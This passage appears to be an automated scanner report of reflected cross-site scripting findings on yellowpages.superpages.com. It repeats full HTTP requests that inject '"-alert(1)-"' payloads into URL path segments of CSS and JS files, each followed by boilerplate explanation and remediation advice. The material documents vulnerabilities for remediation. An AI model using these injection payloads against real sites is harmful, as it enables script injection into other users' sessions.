GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
